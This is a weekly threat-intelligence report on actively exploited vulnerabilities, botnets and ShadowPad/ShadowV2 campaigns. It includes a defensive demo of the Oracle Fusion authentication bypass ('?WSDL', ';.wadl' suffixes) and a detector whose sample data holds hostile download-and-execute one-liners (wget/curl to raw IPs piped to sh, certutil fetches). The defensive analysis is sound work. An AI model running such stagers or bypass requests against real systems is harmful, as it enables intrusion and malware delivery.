IoT Attacks Surge as Threat Actors Accelerate Critical Vulnerability Exploitation

November 28, 2025

Executive Summary

This week’s threat landscape underscored a sustained rise in active exploitation across enterprise platforms, web applications, and IoT infrastructure. CISA added a critical flaw in Oracle Fusion Middleware to its Known Exploited Vulnerabilities (KEV) catalog, while active exploitation was observed targeting the Sneeit Framework WordPress plugin. Meanwhile, the Fortinet FortiWeb vulnerabilities added to the KEV catalog last week continued to draw attacker focus.

Botnet operators such as EnemyBot, Sysrv-K, Andoryu, and AndroxGh0st intensified campaigns against exposed cloud services, routers, and web applications, capitalizing on configuration gaps and delayed patching.

Additionally, ASEC reported the use of a WSUS vulnerability to deploy ShadowPad malware, and Fortinet observed the ShadowV2 Mirai-based botnet leveraging IoT devices during the AWS outage, signaling growing sophistication in infrastructure-level exploitation.

Key points:

  • One new vulnerability was added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.
  • Active exploitation was detected against a Sneeit Framework WordPress plugin vulnerability.
  • Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
  • 9 vulnerabilities were identified as being exploited by active botnet campaigns, indicating weaponization by threat actors.
  • Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

What are the top trending or critical vulnerabilities observed this week?

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-61757 – Missing Authentication for Critical Function Vulnerability in Oracle Fusion Middleware

A Missing Authentication for Critical Function Vulnerability in Oracle Fusion Middleware affects versions 12.2.1.4.0 and 14.1.2.1.0, allowing unauthenticated attackers to gain control of Identity Manager by manipulating API endpoint access using URI modifications such as “?WSDL” or “;.wadl”. The flaw stems from weak regular expression-based filtering and can be chained with a request to the “/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus” endpoint to achieve remote code execution through compilation-time execution of malicious Groovy annotations. Honeypot telemetry recorded multiple exploitation attempts between August 30 and September 9, 2025, with activity traced to IPs 89.238.132[.]76, 185.245.82[.]81, and 138.199.29[.]153, suggesting possible zero-day use prior to Oracle’s patch in October 2025. The vulnerability was recently added to the CISA KEV catalog.
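The design lesson behind this flaw is that an authentication filter must decide on the canonical resource path, not on the raw request URI. The following added illustration (not Oracle’s code; the regex, allowlist and request paths are constructed for the demo) contrasts a suffix-regex check that treats anything ending in “?WSDL” or “.wadl” as a public metadata request with a check that normalizes the path first, so a query string or a “;” path parameter cannot change the authorization decision for the groovyscriptstatus endpoint named above.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Hypothetical, simplified filter for illustration only (not Oracle's code):
# the intent is to let unauthenticated clients fetch service descriptors
# (WSDL / WADL) while everything else under /iam/ requires a session.
PUBLIC_METADATA_RE = re.compile(r"(\?WSDL|\.wadl)$", re.IGNORECASE)

# Endpoint named in the advisory; used here as a constructed request path.
GROOVY_ENDPOINT = "/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus"

# Constructed allowlist of descriptor paths that may be served without a session.
PUBLIC_METADATA_PATHS = frozenset({
    "/iam/governance/applicationmanagement/application.wadl",
})


def naive_requires_auth(request_uri: str) -> bool:
    """Weak check: a suffix regex applied to the RAW request URI.
    Any URI that merely ends in '?WSDL' or '.wadl' is treated as a public
    metadata request, regardless of which resource the path actually names."""
    return PUBLIC_METADATA_RE.search(request_uri) is None


def canonical_path(request_uri: str) -> str:
    """Normalize before authorizing: drop the query string, strip ';'-delimited
    path parameters from every segment, and fold '.' / '..' segments."""
    path = urlsplit(request_uri).path            # urlsplit keeps ';' inside the path
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/" + "/".join(s for s in segments if s))


def hardened_requires_auth(request_uri: str) -> bool:
    """Authorize on the canonical path against an exact allowlist; metadata
    hints carried in the query string or in path parameters are ignored."""
    return canonical_path(request_uri) not in PUBLIC_METADATA_PATHS


if __name__ == "__main__":
    for uri in (GROOVY_ENDPOINT, GROOVY_ENDPOINT + "?WSDL", GROOVY_ENDPOINT + ";.wadl"):
        print(f"{uri}\n  naive requires auth: {naive_requires_auth(uri)}"
              f"  hardened requires auth: {hardened_requires_auth(uri)}")
```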

CVE-2025-6389 - Unauthenticated Remote Code Execution Vulnerability in Sneeit Framework

An Unauthenticated Remote Code Execution Vulnerability affects the Sneeit Framework WordPress plugin in versions up to and including 8.3, enabling attackers to execute arbitrary code on the server without requiring login. The issue lies in the sneeit_articles_pagination_callback() function, which passes user-controlled input directly to PHP’s call_user_func(), allowing actions such as webshell deployment, creation of rogue administrator accounts, modification of theme files, and full site takeover. The Sneeit Framework, widely used by premium themes including the popular FlatNews, was patched in version 8.4. Wordfence reported blocking 3,079 exploitation attempts in the past 24 hours, highlighting the urgent need for users to update immediately.  

CVE-2025-58034 - OS Command Injection Vulnerability in Fortinet FortiWeb

An OS Command Injection Vulnerability in Fortinet FortiWeb affecting versions 8.0.0 to 8.0.1, 7.6.0 to 7.6.5, 7.4.0 to 7.4.10, 7.2.0 to 7.2.11 and 7.0.0 to 7.0.11 allows authenticated attackers to execute unauthorized code on the underlying system through crafted HTTP requests or CLI commands. According to Fortinet, this low-complexity flaw requires no user interaction and has already seen active exploitation. While authentication is required, the risk is significantly elevated in environments relying on shared admin credentials, weak passwords, or external access integrations. Successful exploitation may result in full administrative takeover, persistent backdoor installation, manipulation of web traffic, lateral movement within protected networks, and exfiltration of sensitive data. The vulnerability has been added to the CISA KEV catalog, and Fortinet has released upgraded versions to address it.

CVE-2025-64446 - Path Traversal Vulnerability in Fortinet FortiWeb

A Path Traversal Vulnerability in Fortinet FortiWeb affecting versions 8.0.0 to 8.0.1, 7.6.0 to 7.6.4, 7.4.0 to 7.4.9, 7.2.0 to 7.2.11 and 7.0.0 to 7.0.11 allows unauthenticated attackers to execute administrative commands via crafted HTTP or HTTPS requests. First observed in early October 2025 through live exploitation of a FortiWeb honeypot, the flaw has been actively abused to create privileged accounts, with public proofs of concept demonstrating reliable impact. Analysis confirmed the vulnerability stems from a combination of path traversal and authentication bypass techniques. Fortinet has issued upgraded versions to address the issue, which has now been added to the CISA KEV catalog. Exploitation continues in the wild, highlighting the urgency of patch deployment.

What did Cytellite sensors detect this week?

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Vulnerability | Product | Severity | Title | Exploited in-the-wild | CISA KEV
CVE-2025-31324 | SAP NetWeaver | Critical | An Unrestricted Vulnerability in the SAP NetWeaver | True | True
CVE-2025-26399 | SolarWinds Web Help Desk | Critical | Deserialization of Untrusted Data Vulnerability in SolarWinds Web Help Desk | True | False
CVE-2024-47176 | CUPS | Medium | Improper Input Validation Vulnerability in OpenPrinting CUPS browsed through 2.0.1 leads to remote code execution | True | False
CVE-2024-4577 | PHP-CGI on Windows | High | Critical Argument Injection Vulnerability in PHP on Windows servers | True | True
CVE-2024-3721 | TBK DVR Devices | Medium | OS Command Injection Vulnerability in TBK DVR-4104 and DVR-4216 up to 20240412 | True | False
CVE-2024-3400 | Palo Alto Networks PAN-OS | Critical | Command Injection Vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True
CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication Bypass Vulnerability in ConnectWise ScreenConnect leads to sensitive information disclosure | True | True
CVE-2023-38646 | Metabase open source and Enterprise | Critical | Arbitrary Command Execution Vulnerability in Metabase open source and Enterprise | True | False
CVE-2023-34960 | Chamilo | Critical | Command Injection Vulnerability in the wsConvertPpt component of Chamilo via a SOAP API call with a crafted PowerPoint name | False | False
CVE-2023-33831 | FUXA | Critical | Unauthenticated Remote Code Execution in FUXA's scripting component | True | False

What botnet activity was observed this week?

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Vulnerability | Product | Title | Exploit | Abused by Botnet
CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K
CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution Vulnerability in Gitlab-Exiftool | True | Andoryu
CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st
CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai

Which vulnerabilities were abused by malware this week?

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

CVE-2025-59287

According to AhnLab Security Intelligence Center (ASEC), threat actors have exploited a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute ShadowPad malware, a remote access trojan commonly used by Chinese APT groups. The flaw, identified as CVE-2025-59287 and patched by Microsoft last month, is a critical deserialization issue that enables attackers to gain system-level access to publicly exposed WSUS servers. Attackers have leveraged the vulnerability to execute utilities such as “curl.exe” and “certutil.exe” to download ShadowPad from an external server, following reconnaissance and initial access. The exploit was rapidly weaponized after proof-of-concept code became publicly available and remains under active exploitation. The activity has not yet been attributed to a specific threat actor.  
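The botnet section above notes that payloads are recognised by wget commands pointing at raw IP addresses, and the WSUS campaign downloads ShadowPad with curl.exe and certutil.exe. As an added example (not from the report, ASEC or Fortinet), this detector classifies captured command strings by downloader tool, raw-IP URL and whether the chain also executes what it fetched; the sample payloads are constructed, use RFC 5737 test addresses, and are not real captures.

```python
import re
from typing import Optional

# Constructed sample payload fragments (not real captures) in the shapes the
# report describes: Linux botnet stagers fetching a dropper from a raw IP, and
# a Windows post-exploitation chain using curl.exe / certutil.exe.
SAMPLE_PAYLOADS = [
    "cd /tmp; wget http://203.0.113.10/bins/arm7 -O .a; chmod 777 .a; ./.a",
    "curl -s http://198.51.100.22:8080/x.sh | sh",
    "cmd.exe /c curl.exe -o C:\\Windows\\Temp\\svc.exe http://203.0.113.45/svc.exe",
    "certutil.exe -urlcache -split -f http://192.0.2.77/payload.dat C:\\ProgramData\\p.dat",
    "GET /index.html HTTP/1.1",                    # benign request line, must not match
    "wget https://packages.example.org/pkg.deb",   # hostname URL, not a raw IP
]

# A URL whose host is a literal IPv4 address (optionally with a port).
IPV4_URL = r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?/\S*"

# Downloader tool followed, within the same shell command (no ; | & crossing),
# by a raw-IP URL. Matching both in one command keeps false positives low.
DOWNLOADER = re.compile(
    r"\b(?P<tool>wget|curl(?:\.exe)?|certutil(?:\.exe)?)\b[^\n;|&]*?(?P<url>" + IPV4_URL + ")",
    re.IGNORECASE,
)

# Signs that the fetched file is executed in the same chain (pipe to a shell,
# chmod then run). Raises the severity of a hit from "download" to "stager".
EXEC_CHAIN = re.compile(r"(\|\s*(?:ba)?sh\b|;\s*chmod\s+[0-7]{3}|;\s*\./)", re.IGNORECASE)


def classify(payload: str) -> Optional[dict]:
    """Return tool, raw-IP URL, execution flag and platform for a downloader-to-IP
    pattern; None when the payload does not contain one."""
    m = DOWNLOADER.search(payload)
    if not m:
        return None
    tool = m.group("tool").lower()
    return {
        "tool": tool,
        "url": m.group("url"),
        "executes": bool(EXEC_CHAIN.search(payload)),
        "platform": "windows" if tool.endswith(".exe") else "unix",
    }


def triage(payloads):
    """Keep only payloads that match, paired with their classification."""
    return [(p, c) for p in payloads for c in [classify(p)] if c]
```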

ShadowV2 Botnet Exploits IoT Weaknesses During AWS Outage

According to Fortinet’s FortiGuard Labs, a Mirai-based botnet known as ShadowV2 surfaced during last October’s widespread AWS outage, infecting IoT devices across multiple industries and regions in what appears to have been a potential test operation. The malware enabled attackers to remotely control compromised devices and conduct large-scale DDoS attacks, though activity was limited to the duration of the outage. ShadowV2 spread through vulnerabilities affecting devices from the following vendors:

  • DD-WRT - CVE-2009-2765
  • D-Link - CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915
  • DigiEver - CVE-2023-52163
  • TBK - CVE-2024-3721
  • TP-Link - CVE-2024-53375

The campaign impacted sectors including technology, manufacturing, retail, hospitality, government, telecommunications, and managed security services across 28 countries. The attacks, traced to the IP address 198[.]199[.]72[.]27, targeted routers, NAS devices, and DVRs, highlighting the ongoing risk posed by exposed IoT infrastructure.

ShadowV2 infections spanned 28 countries, including the United States, Canada, Mexico, Brazil, the UK, France, Germany, Italy, the Netherlands, Belgium, Czechia, Austria, Croatia, Greece, Turkey, Russia, China, Japan, Taiwan, Thailand, the Philippines, Australia, Saudi Arabia, Egypt, South Africa, Morocco, Bolivia, and Chile.

Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS
CVE-2025-59287 | Critical | A Deserialization of Untrusted Data Vulnerability in Microsoft Windows Server Update Service (WSUS) | Yes | ShadowPad | False
CVE-2024-3721 | Medium | An OS Command Injection Vulnerability in the TBK DVR-4104 and DVR-4216 | No | ShadowV2 botnet | False
CVE-2024-10914 | Critical | An OS Command Injection Vulnerability in the D-Link Network-attached storage devices | No | ShadowV2 botnet | False
CVE-2024-10915 | Critical | An OS Command Injection Vulnerability in the D-Link Network-attached storage devices | No | ShadowV2 botnet | False
CVE-2024-53375 | High | An Authenticated Remote Code Execution Vulnerability in the TP-Link Archer router series | No | ShadowV2 botnet | False
CVE-2023-52163 | Medium | A Command Injection Vulnerability in the DigiEver DS-2105 Pro device | No | ShadowV2 botnet | False
CVE-2022-37055 | High | A Buffer Overflow Vulnerability in the D-Link Go-RT-AC750 routers | No | ShadowV2 botnet | False
CVE-2020-25506 | Critical | A Command Injection Vulnerability in the D-Link DNS-30 which can lead to remote arbitrary code execution | No | ShadowV2 botnet | False
CVE-2009-2765 | High | An Improper Input Validation Vulnerability in DD-WRT allows remote attackers to execute arbitrary commands | No | ShadowV2 botnet | False

Were any PRE-NVD vulnerabilities identified this week?

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

CVE-ID | Type of vulnerability | Product | Reference
CVE-2025-9820 | Stack Write Buffer Overflow | Linux-gnutils | Resource
CVE-2025-13207 | Command Injection | Tenda’s 4G03 Pro and N300 series routers | Resource
CVE-2025-13593 | Arbitrary File Read | ActiveProtect Agent | Resource
CVE-2025-13698 | Directory Traversal Arbitrary File Creation | Deciso OPNsense | Resource

FAQs:

1) How are attackers leveraging IoT devices in large-scale campaigns?

A) Attackers are increasingly exploiting exposed IoT assets such as routers, NAS systems, and DVRs to build botnets, conduct reconnaissance, and launch DDoS attacks, due to their widespread deployment and limited monitoring.  

2) What should organizations do if critical devices are end-of-life (EOL)?

A) If devices are EOL, they should be isolated from public networks, replaced with supported hardware, or secured through strict access controls and network segmentation to reduce the risk of exploitation.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.  

4) What does inclusion in the CISA KEV catalog indicate about a vulnerability’s risk level?  

A) When a vulnerability is added to the CISA KEV catalog, it signifies that it is being actively exploited in real-world attacks and poses a serious, immediate risk. CISA includes only confirmed exploited vulnerabilities in this list to ensure organizations focus on patching the most dangerous threats first. Being listed means the flaw demands urgent remediation to prevent compromise across government and enterprise environments.
